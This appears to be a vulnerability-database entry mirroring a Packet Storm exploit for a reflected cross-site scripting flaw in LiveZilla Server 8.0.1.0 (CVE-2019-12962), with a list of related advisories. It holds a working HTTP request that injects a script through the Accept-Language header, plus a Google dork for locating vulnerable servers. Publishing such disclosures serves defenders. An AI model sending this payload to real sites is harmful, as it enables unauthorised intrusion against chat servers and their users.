Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
packetstormClement CruchetPACKETSTORM:161867
HistoryMar 19, 2021 - 12:00 a.m.

LiveZilla Server 8.0.1.0 Cross Site Scripting

2021-03-1900:00:00
Clement Cruchet
packetstormsecurity.com
162
JSON
`# Exploit Title: LiveZilla Server 8.0.1.0 - 'Accept-Language' Reflected XSS  
# Google Dork: inurl: inurl:/mobile/index.php intitle:LiveZilla  
# Date: 18 Mars 2021  
# Exploit Author: ClΓ©ment Cruchet  
# Vendor Homepage: https://www.livezilla.net  
# Software Link: https://www.livezilla.net/downloads/en/  
# Version: LiveZilla Server 8.0.1.0 and before  
# Tested on: Windows/Linux  
# CVE : CVE-2019-12962  
  
GET /mobile/index.php HTTP/1.1  
Host: chat.website.com  
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:86.0) Gecko/20100101 Firefox/86.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8  
Accept-Language: ';alert(document.cookie)//  
Accept-Encoding: gzip, deflate  
DNT: 1  
Connection: close  
Upgrade-Insecure-Requests: 1  
  
`

Related

cve 1
prion 1
zdt 1
nuclei 1
exploitdb 1
openvas 1
wallarmlab 1
cve
cve
CVE-2019-12962
2019-06-25 13:15:00
prion
prion
Design/Logic Flaw
2019-06-25 13:15:00
zdt
zdt
LiveZilla Server 8.0.1.0 - (Accept-Language) Reflected XSS Vulnerability
2021-03-19 00:00:00
nuclei
nuclei
LiveZilla Server 8.0.1.0 - Cross-Site Scripting
2022-05-08 14:45:08
exploitdb
exploitdb
LiveZilla Server 8.0.1.0 - 'Accept-Language' Reflected XSS
2021-03-19 00:00:00
openvas
openvas
LiveZilla < 8.0.1.2 Multiple XSS Vulnerabilities
2019-07-02 00:00:00
wallarmlab
wallarmlab
Weekly exploit digest – March, 15-21 – VMware View Planner, Win32k ConsoleControl, Microsoft Windows Containers DP API
2021-03-21 13:09:00
JSON
Related for PACKETSTORM:161867
cve1prion1zdt1nuclei1exploitdb1openvas1wallarmlab1